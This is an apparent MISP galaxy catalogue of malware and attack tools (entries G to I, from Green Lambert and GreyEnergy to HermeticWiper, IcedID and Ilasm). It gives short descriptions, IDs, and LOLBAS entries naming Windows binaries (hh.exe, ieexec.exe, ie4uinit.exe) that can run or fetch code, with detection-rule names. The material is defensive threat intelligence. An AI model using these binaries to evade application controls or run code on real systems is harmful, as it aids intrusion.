Green Lambert is a modular backdoor that security researchers assess has been used by an advanced threat group referred to as Longhorn and The Lamberts. First reported in 2017, the Windows variant of Green Lambert may have been used as early as 2008; a macOS version was uploaded to a multiscanner service in September 2014.[Kaspersky Lamberts Toolkit April 2017][Objective See Green Lambert for OSX Oct 2021]
Internal MISP references
UUID f5691425-6690-4e5e-8304-3ede9d2f5a90
which can be used as unique global reference for Green Lambert
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Linux', 'macOS', 'Windows', 'iOS'] |
software_attack_id | S0690 |
source | MITRE |
type | ['malware'] |
GreyEnergy
GreyEnergy is a backdoor written in C and compiled in Visual Studio. GreyEnergy shares similarities with the BlackEnergy malware and is thought to be the successor of it.[ESET GreyEnergy Oct 2018]
Internal MISP references
UUID f646e7f9-4d09-46f6-9831-54668fa20483
which can be used as unique global reference for GreyEnergy
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0342 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
GRIFFON
GRIFFON is a JavaScript backdoor used by FIN7. [SecureList Griffon May 2019]
Internal MISP references
UUID ad358082-d83a-4c22-81a1-6c34dd67af26
which can be used as unique global reference for GRIFFON
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0417 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
GrimAgent
GrimAgent is a backdoor that has been used before the deployment of Ryuk ransomware since at least 2020; it is likely used by FIN6 and Wizard Spider.[Group IB GrimAgent July 2021]
Internal MISP references
UUID c40a71d4-8592-4f82-8af5-18f763e52caf
which can be used as unique global reference for GrimAgent
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0632 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Grixba
Grixba is a tool used by Play Ransomware operators to scan victim networks for information discovery purposes. Grixba compiles and saves collected information into CSV files, which are then compressed with WinRAR and exfiltrated to threat actors.[Symantec Play Ransomware April 19 2023]
Internal MISP references
UUID 3ff9e020-8a7a-4c6f-a607-117ce9e436c5
which can be used as unique global reference for Grixba
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5079 |
source | Tidal Cyber |
tags | ['4d767e87-4cf6-438a-927a-43d2d0beaab7'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
gsecdump
gsecdump is a publicly-available credential dumper used to obtain password hashes and LSA secrets from Windows operating systems. [TrueSec Gsecdump]
Internal MISP references
UUID 5ffe662f-9da1-4b6f-ad3a-f296383e828c
which can be used as unique global reference for gsecdump
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0008 |
source | MITRE |
tags | ['4d767e87-4cf6-438a-927a-43d2d0beaab7'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
GuLoader
GuLoader is a file downloader that has been used since at least December 2019 to distribute a variety of remote administration tool (RAT) malware, including NETWIRE, Agent Tesla, NanoCore, FormBook, and Parallax RAT.[Unit 42 NETWIRE April 2020][Medium Eli Salem GuLoader April 2021]
Internal MISP references
UUID 03e985d6-870b-4533-af13-08b1e0511444
which can be used as unique global reference for GuLoader
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0561 |
source | MITRE |
tags | ['c6e1f516-1a18-4ff9-b563-e6ac8103b104', '2feda37d-5579-4102-a073-aa02e82cb49f', '84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
H1N1
H1N1 is a malware variant that has been distributed via a campaign using VBA macros to infect victims. Although it initially had only loader capabilities, it has evolved to include information-stealing functionality. [Cisco H1N1 Part 1]
Internal MISP references
UUID 5f1602fe-a4ce-4932-9cf9-ec842f2c58f1
which can be used as unique global reference for H1N1
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0132 |
source | MITRE |
type | ['malware'] |
Hacking Team UEFI Rootkit
Hacking Team UEFI Rootkit is a rootkit developed by the company Hacking Team as a method of persistence for remote access software. [TrendMicro Hacking Team UEFI]
Internal MISP references
UUID 75db2ac3-901e-4b1f-9a0d-bac6562d57a3
which can be used as unique global reference for Hacking Team UEFI Rootkit
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
software_attack_id | S0047 |
source | MITRE |
type | ['malware'] |
HALFBAKED
HALFBAKED is a malware family consisting of multiple components intended to establish persistence in victim networks. [FireEye FIN7 April 2017]
Internal MISP references
UUID 5edf0ef7-a960-4500-8a89-8c8b4fdf8824
which can be used as unique global reference for HALFBAKED
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
software_attack_id | S0151 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
HAMMERTOSS
HAMMERTOSS is a backdoor that was used by APT29 in 2015. [FireEye APT29] [F-Secure The Dukes]
Internal MISP references
UUID cc07f03f-9919-4856-9b30-f4d88940b0ec
which can be used as unique global reference for HAMMERTOSS
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0037 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Hancitor
Hancitor is a downloader that has been used by Pony and other information stealing malware.[Threatpost Hancitor][FireEye Hancitor]
Internal MISP references
UUID 4eee3272-07fa-48ee-a7b9-9dfee3e4550a
which can be used as unique global reference for Hancitor
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0499 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
HAPPYWORK
HAPPYWORK is a downloader used by APT37 to target South Korean government and financial victims in November 2016. [FireEye APT37 Feb 2018]
Internal MISP references
UUID c2c31b2e-5da6-4feb-80e3-14ea6d0ea7e8
which can be used as unique global reference for HAPPYWORK
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
software_attack_id | S0214 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
HARDRAIN
HARDRAIN is a Trojan malware variant reportedly used by the North Korean government. [US-CERT HARDRAIN March 2018]
Internal MISP references
UUID ad0ae3b7-88aa-48b3-86ca-6a5d8b5309a7
which can be used as unique global reference for HARDRAIN
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0246 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Havij
Havij is an automatic SQL Injection tool distributed by the Iranian ITSecTeam security company. Havij has been used by penetration testers and adversaries. [Check Point Havij Analysis]
Internal MISP references
UUID 8bd36306-bd4b-4a76-8842-44acb0cedbcc
which can be used as unique global reference for Havij
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
software_attack_id | S0224 |
source | MITRE |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
HAWKBALL
HAWKBALL is a backdoor that was observed in targeting of the government sector in Central Asia.[FireEye HAWKBALL Jun 2019]
Internal MISP references
UUID 392c5a32-53b5-4ce8-a946-226cb533cc4e
which can be used as unique global reference for HAWKBALL
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0391 |
source | MITRE |
type | ['malware'] |
hcdLoader
hcdLoader is a remote access tool (RAT) that has been used by APT18. [Dell Lateral Movement]
Internal MISP references
UUID a7ffe1bd-45ca-4ca4-94da-3b6c583a868d
which can be used as unique global reference for hcdLoader
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0071 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
HDoor
HDoor is malware that has been customized and used by the Naikon group. [Baumgartner Naikon 2015]
Internal MISP references
UUID f155b6f9-258d-4446-8867-fe5ee26d8c72
which can be used as unique global reference for HDoor
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0061 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
HELLOKITTY
HELLOKITTY is a ransomware written in C++ that shares similar code structure and functionality with DEATHRANSOM and FIVEHANDS. HELLOKITTY has been used since at least 2020, targets have included a Polish video game developer and a Brazilian electric power company.[FireEye FiveHands April 2021]
Internal MISP references
UUID 813a4ca1-84fe-42dc-89de-5873d028f98d
which can be used as unique global reference for HELLOKITTY
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0617 |
source | MITRE |
tags | ['4ac8dcde-2665-4066-9ad9-b5572d5f0d28', '3535caad-a155-4996-b986-70bc3cd5ce1e', 'f1ad9eba-f4fd-4aec-92c0-833ac14d741b', '5e7433ad-a894-4489-93bc-41e90da90019', '15787198-6c8b-4f79-bf50-258d55072fee', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Helminth
Helminth is a backdoor that has at least two variants - one written in VBScript and PowerShell that is delivered via a macros in Excel spreadsheets, and one that is a standalone Windows executable. [Palo Alto OilRig May 2016]
Internal MISP references
UUID d6560c81-1e7e-4d01-9814-4be4fb43e655
which can be used as unique global reference for Helminth
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0170 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
HermeticWiper
HermeticWiper is a data wiper that has been used since at least early 2022, primarily against Ukraine with additional activity observed in Latvia and Lithuania. Some sectors targeted include government, financial, defense, aviation, and IT services.[SentinelOne Hermetic Wiper February 2022][Symantec Ukraine Wipers February 2022][Crowdstrike DriveSlayer February 2022][ESET Hermetic Wiper February 2022][Qualys Hermetic Wiper March 2022]
Internal MISP references
UUID f0456f14-4913-4861-b4ad-5e7f3960040e
which can be used as unique global reference for HermeticWiper
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0697 |
source | MITRE |
tags | ['2e621fc5-dea4-4cb9-987e-305845986cd3'] |
type | ['malware'] |
HermeticWizard
HermeticWizard is a worm that has been used to spread HermeticWiper in attacks against organizations in Ukraine since at least 2022.[ESET Hermetic Wizard March 2022]
Internal MISP references
UUID 36ddc8cd-8f80-489e-a702-c682936b5393
which can be used as unique global reference for HermeticWizard
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0698 |
source | MITRE |
tags | ['e809d252-12cc-494d-94f5-954c49eb87ce'] |
type | ['malware'] |
Heyoka Backdoor
Heyoka Backdoor is a custom backdoor--based on the Heyoka open source exfiltration tool--that has been used by Aoqin Dragon since at least 2013.[SentinelOne Aoqin Dragon June 2022][Sourceforge Heyoka 2022]
Internal MISP references
UUID 1841a6e8-6c23-46a1-9c81-783746083764
which can be used as unique global reference for Heyoka Backdoor
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1027 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Hh
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Binary used for processing chm files in Windows
Author: Oddvar Moe
Paths: * C:\Windows\hh.exe * C:\Windows\SysWOW64\hh.exe
Resources: * https://oddvar.moe/2017/08/13/bypassing-device-guard-umci-using-chm-cve-2017-8625/
Detection: * Sigma: proc_creation_win_hh_chm_execution.yml * Sigma: proc_creation_win_hh_html_help_susp_child_process.yml * Elastic: execution_via_compiled_html_file.toml * Elastic: execution_html_help_executable_program_connecting_to_the_internet.toml * Splunk: detect_html_help_spawn_child_process.yml * Splunk: detect_html_help_url_in_command_line.yml[Hh.exe - LOLBAS Project]
Internal MISP references
UUID 5a0d0b83-5a10-425c-98f7-6cb8eb76fda4
which can be used as unique global reference for Hh
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5114 |
source | Tidal Cyber |
tags | ['7d028d1e-7a95-47f0-9367-55517f9ef170', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
HiddenWasp
HiddenWasp is a Linux-based Trojan used to target systems for remote control. It comes in the form of a statically linked ELF binary with stdlibc++.[Intezer HiddenWasp Map 2019]
Internal MISP references
UUID ec02fb9c-bf9f-404d-bc54-819f2b3fb040
which can be used as unique global reference for HiddenWasp
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Linux'] |
software_attack_id | S0394 |
source | MITRE |
type | ['malware'] |
HIDEDRV
HIDEDRV is a rootkit used by APT28. It has been deployed along with Downdelph to execute and hide that malware. [ESET Sednit Part 3] [Sekoia HideDRV Oct 2016]
Internal MISP references
UUID ce1af464-0b14-4fe9-8591-a6fe58aa96c7
which can be used as unique global reference for HIDEDRV
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0135 |
source | MITRE |
tags | ['1efd43ee-5752-49f2-99fe-e3441f126b00'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Hikit
Hikit is malware that has been used by Axiom for late-stage persistence and exfiltration after the initial compromise.[Novetta-Axiom][FireEye Hikit Rootkit]
Internal MISP references
UUID 8046c80c-4339-4cfb-8bfd-464801db2bfe
which can be used as unique global reference for Hikit
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0009 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Hildegard
Hildegard is malware that targets misconfigured kubelets for initial access and runs cryptocurrency miner operations. The malware was first observed in January 2021. The TeamTNT activity group is believed to be behind Hildegard. [Unit 42 Hildegard Malware]
Internal MISP references
UUID 7ef8cd3a-33cf-43bb-a3b8-a78fc844ce0c
which can be used as unique global reference for Hildegard
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Containers', 'Linux', 'IaaS'] |
software_attack_id | S0601 |
source | MITRE |
tags | ['4fa6f8e1-b0d5-4169-8038-33e355c08bde', '8d95e4d6-9a1e-4920-9f5c-83d9fe07a66e'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Hi-Zor
Hi-Zor is a remote access tool (RAT) that has characteristics similar to Sakula. It was used in a campaign named INOCNATION. [Fidelis Hi-Zor]
Internal MISP references
UUID 286184d9-f28a-4d5a-a9dd-2216b3c47809
which can be used as unique global reference for Hi-Zor
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0087 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
HOMEFRY
HOMEFRY is a 64-bit Windows password dumper/cracker that has previously been used in conjunction with other Leviathan backdoors. [FireEye Periscope March 2018]
Internal MISP references
UUID 16db13f2-f350-4323-96cb-c5f4ac36c3e0
which can be used as unique global reference for HOMEFRY
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0232 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
HOPLIGHT
HOPLIGHT is a backdoor Trojan that has reportedly been used by the North Korean government.[US-CERT HOPLIGHT Apr 2019]
Internal MISP references
UUID 4d94594c-2224-46ca-8bc3-28b12ed139f9
which can be used as unique global reference for HOPLIGHT
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0376 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
HotCroissant
HotCroissant is a remote access trojan (RAT) attributed by U.S. government entities to malicious North Korean government cyber activity, tracked collectively as HIDDEN COBRA.[US-CERT HOTCROISSANT February 2020] HotCroissant shares numerous code similarities with Rifdoor.[Carbon Black HotCroissant April 2020]
Internal MISP references
UUID a00e7fcc-b4e8-4f64-83d2-f9db64f0f3fe
which can be used as unique global reference for HotCroissant
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0431 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
HTRAN
HTRAN is a tool that proxies connections through intermediate hops and aids users in disguising their true geographical location. It can be used by adversaries to hide their location when interacting with the victim networks. [Operation Quantum Entanglement][NCSC Joint Report Public Tools]
Internal MISP references
UUID b98d9fe7-9aa3-409a-bf5c-eadb01bac948
which can be used as unique global reference for HTRAN
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Linux', 'Windows'] |
software_attack_id | S0040 |
source | MITRE |
tags | ['febea5b6-2ea2-402b-8bec-f3f5b3f73c59'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
HTTPBrowser
HTTPBrowser is malware that has been used by several threat groups. [ThreatStream Evasion Analysis] [Dell TG-3390] It is believed to be of Chinese origin. [ThreatConnect Anthem]
Internal MISP references
UUID c4fe23f7-f18c-40f6-b431-0b104b497eaa
which can be used as unique global reference for HTTPBrowser
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0070 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
httpclient
httpclient is malware used by Putter Panda. It is a simple tool that provides a limited range of functionality, suggesting it is likely used as a second-stage or supplementary/backup tool. [CrowdStrike Putter Panda]
Internal MISP references
UUID bf19eba4-7ea1-4c24-95c6-6bcfb44f4c49
which can be used as unique global reference for httpclient
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0068 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
HUI Loader
HUI Loader is a custom DLL loader that has been used since at least 2015 by China-based threat groups including Cinnamon Tempest and menuPass to deploy malware on compromised hosts. HUI Loader has been observed in campaigns loading SodaMaster, PlugX, Cobalt Strike, Komplex, and several strains of ransomware.[SecureWorks BRONZE STARLIGHT Ransomware Operations June 2022]
Internal MISP references
UUID 2df88e4e-5a89-5535-ae1a-4c68b19d9078
which can be used as unique global reference for HUI Loader
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1097 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Hydraq
Hydraq is a data-theft trojan first used by Elderwood in the 2009 Google intrusion known as Operation Aurora, though variations of this trojan have been used in more recent campaigns by other Chinese actors, possibly including APT17.[MicroFocus 9002 Aug 2016][Symantec Elderwood Sept 2012][Symantec Trojan.Hydraq Jan 2010][ASERT Seven Pointed Dagger Aug 2015][FireEye DeputyDog 9002 November 2013][ProofPoint GoT 9002 Aug 2017][FireEye Sunshop Campaign May 2013][PaloAlto 3102 Sept 2015]
Internal MISP references
UUID 4ffbca79-358a-4ba5-bfbb-dc1694c45646
which can be used as unique global reference for Hydraq
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0203 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
HyperBro
HyperBro is a custom in-memory backdoor used by Threat Group-3390.[Unit42 Emissary Panda May 2019][Securelist LuckyMouse June 2018][Hacker News LuckyMouse June 2018]
Internal MISP references
UUID 57cec527-26fb-44a1-b1a9-506a3af2c9f2
which can be used as unique global reference for HyperBro
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0398 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
HyperStack
HyperStack is a RPC-based backdoor used by Turla since at least 2018. HyperStack has similarities to other backdoors used by Turla including Carbon.[Accenture HyperStack October 2020]
Internal MISP references
UUID ba3236e9-c86b-4b5d-89ed-7f71940a0588
which can be used as unique global reference for HyperStack
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0537 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
IceApple
IceApple is a modular Internet Information Services (IIS) post-exploitation framework, that has been used since at least 2021 against the technology, academic, and government sectors.[CrowdStrike IceApple May 2022]
Internal MISP references
UUID 5a73defd-6a1a-4132-8427-cec649e8267a
which can be used as unique global reference for IceApple
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1022 |
source | MITRE |
type | ['malware'] |
IcedID
IcedID is a modular banking malware designed to steal financial information that has been observed in the wild since at least 2017. IcedID has been downloaded by Emotet in multiple campaigns.[IBM IcedID November 2017][Juniper IcedID June 2020]
Internal MISP references
UUID 7f59bb7c-5fa9-497d-9d8e-ba9349fd9433
which can be used as unique global reference for IcedID
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0483 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Ie4uinit
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Executes commands from a specially prepared ie4uinit.inf file.
Author: Oddvar Moe
Paths: * c:\windows\system32\ie4uinit.exe * c:\windows\sysWOW64\ie4uinit.exe * c:\windows\system32\ieuinit.inf * c:\windows\sysWOW64\ieuinit.inf
Resources: * https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/
Detection: * IOC: ie4uinit.exe copied outside of %windir% * IOC: ie4uinit.exe loading an inf file (ieuinit.inf) from outside %windir% * Sigma: proc_creation_win_lolbin_ie4uinit.yml[Ie4uinit.exe - LOLBAS Project]
Internal MISP references
UUID 332e37c0-63fe-4e99-85a9-94210d42c21d
which can be used as unique global reference for Ie4uinit
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5116 |
source | Tidal Cyber |
tags | ['f32f1513-7277-4257-9c35-c8ab3da17c84', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Ieadvpack
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: INF installer for Internet Explorer. Has much of the same functionality as advpack.dll.
Author: LOLBAS Team
Paths: * c:\windows\system32\ieadvpack.dll * c:\windows\syswow64\ieadvpack.dll
Resources: * https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/ * https://twitter.com/pabraeken/status/991695411902599168 * https://twitter.com/0rbz_/status/974472392012689408
Detection: * Sigma: proc_creation_win_rundll32_susp_activity.yml * Splunk: detect_rundll32_application_control_bypass___advpack.yml[Ieadvpack.dll - LOLBAS Project]
Internal MISP references
UUID e1aa3cbd-2337-47d6-b6b0-beb5d1bbfc1e
which can be used as unique global reference for Ieadvpack
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5190 |
source | Tidal Cyber |
tags | ['e794994d-c38a-44d9-9253-53191ca9e56b', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
iediagcmd
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Diagnostics Utility for Internet Explorer
Author: manasmbellani
Paths: * C:\Program Files\Internet Explorer\iediagcmd.exe
Resources: * https://twitter.com/Hexacorn/status/1507516393859731456
Detection: * Sigma: https://github.com/manasmbellani/mycode_public/blob/master/sigma/rules/win_proc_creation_lolbin_iediagcmd.yml * IOC: Sysmon Event ID 1 * IOC: Execution of process iediagcmd.exe with /out could be suspicious[iediagcmd.exe - LOLBAS Project]
Internal MISP references
UUID 1feba268-9fff-495f-94e9-5b46336bff3b
which can be used as unique global reference for iediagcmd
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5117 |
source | Tidal Cyber |
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Ieexec
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: The IEExec.exe application is an undocumented Microsoft .NET Framework application that is included with the .NET Framework. You can use the IEExec.exe application as a host to run other managed applications that you start by using a URL.
Author: Oddvar Moe
Paths: * C:\Windows\Microsoft.NET\Framework\v2.0.50727\ieexec.exe * C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ieexec.exe
Resources: * https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/
Detection: * Sigma: proc_creation_win_lolbin_ieexec_download.yml * Elastic: defense_evasion_unusual_process_network_connection.toml * Elastic: defense_evasion_misc_lolbin_connecting_to_the_internet.toml * Elastic: defense_evasion_network_connection_from_windows_binary.toml * IOC: Network connections originating from ieexec.exe may be suspicious[Ieexec.exe - LOLBAS Project]
Internal MISP references
UUID e7ede205-4d50-42c3-92d0-4988aca5c4a1
which can be used as unique global reference for Ieexec
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5118 |
source | Tidal Cyber |
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Ieframe
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Internet Browser DLL for translating HTML code.
Author: LOLBAS Team
Paths: * c:\windows\system32\ieframe.dll * c:\windows\syswow64\ieframe.dll
Resources: * http://www.hexacorn.com/blog/2018/03/15/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline-part-5/ * https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/ * https://twitter.com/bohops/status/997690405092290561 * https://windows10dll.nirsoft.net/ieframe_dll.html
Detection: * Sigma: proc_creation_win_rundll32_susp_activity.yml[Ieframe.dll - LOLBAS Project]
Internal MISP references
UUID 57072f02-06c1-4267-b665-fbbf72b96bb4
which can be used as unique global reference for Ieframe
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5191 |
source | Tidal Cyber |
tags | ['fc23fb85-8c48-4f0b-aeb6-b78fd6e25e0a', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
ifconfig
ifconfig is a Unix-based utility used to gather information about and interact with the TCP/IP settings on a system. [Wikipedia Ifconfig]
Internal MISP references
UUID 93ab16d1-625e-4b1c-bb28-28974c269c47
which can be used as unique global reference for ifconfig
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
software_attack_id | S0101 |
source | MITRE |
type | ['tool'] |
iKitten
iKitten is a macOS exfiltration agent [objsee mac malware 2017].
Internal MISP references
UUID 71098f6e-a2c0-434f-b991-6c079fd3e82d
which can be used as unique global reference for iKitten
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['macOS'] |
software_attack_id | S0278 |
source | MITRE |
type | ['malware'] |
Ilasm
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: used for compile c# code into dll or exe.
Author: Hai vaknin (lux)
Paths: * C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe * C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe
Resources: * https://github.com/LuxNoBulIshit/BeforeCompileBy-ilasm/blob/master/hello_world.txt
Detection: * IOC: Ilasm may not be used often in production environments (such as on endpoints) * Sigma: proc_creation_win_lolbin_ilasm.yml[Ilasm.exe - LOLBAS Project]
Internal MISP references
UUID 492104c0-79d6-461e-9dc5-0e4bfd3f2387
which can be used as unique global reference for Ilasm
